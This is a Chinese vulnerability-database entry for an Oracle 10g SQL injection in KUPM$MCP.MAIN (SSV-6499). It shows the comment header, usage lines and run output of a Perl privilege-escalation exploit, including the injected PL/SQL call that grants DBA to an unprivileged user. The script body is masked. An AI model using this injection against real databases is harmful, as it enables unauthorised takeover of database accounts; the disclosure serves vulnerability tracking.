Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

基本字段

漏洞编号:
SSV-6499
披露/发现时间:
未知
提交时间:
2007-03-28
漏洞等级:
漏洞类别:
SQL 注入
影响组件:
Oracle
漏洞作者:
未知
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0.3KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/usr/bin/perl
#
# Remote Oracle KUPM$MCP.MAIN exploit (10g)
#
# Grant or revoke dba permission to unprivileged user
# 
# Tested on \"Oracle Database 10g Enterprise Edition Release 10.1.0.3.0\"
# 
#   REF:    http://www.red-database-security.com/
#   
#   AUTHOR: Andrea \"bunker\" Purificato
#           http://rawlab.mindcreations.com
#
#   DATE:   Copyright 2007 - Tue Mar 27 10:47:14 CEST 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
# 
# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r
#  [-] Wait...
#  [-] Revoking DBA from BUNKER...
#  DBD::Oracle::db do failed: ORA-01951: ROLE \'DBA\' not granted to \'BUNKER\' (DBD ERROR: OCIStmtExecute) [for Statement \"REVOKE DBA FROM BUNKER\"] at kupm-mcpmain.pl line 97.
#  [-] Done!
# 
# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -g
#  [-] Wait...
#  [-] Creating evil function...
#  [-] Go ...(don\'t worry about errors)!
#  DBD::Oracle::st execute failed: ORA-06512: at \"SYS.KUPM$MCP\", line 874
#  ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement \"
#  BEGIN
#   SYS.KUPM$MCP.MAIN(\'\'\' AND 0=BUNKER.own--\',\'\');
#  END;\"] at kupm-mcpmain.pl line 119.
#  [-] YOU GOT THE POWAH!!
# 
# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r
#  [-] Wait...
#  [-] Revoking DBA from BUNKER...
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

共 1 兑换

参考链接

解决方案

临时解决方案

官方解决方案

升级到最新无漏洞版本

防护方案

人气 1243
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负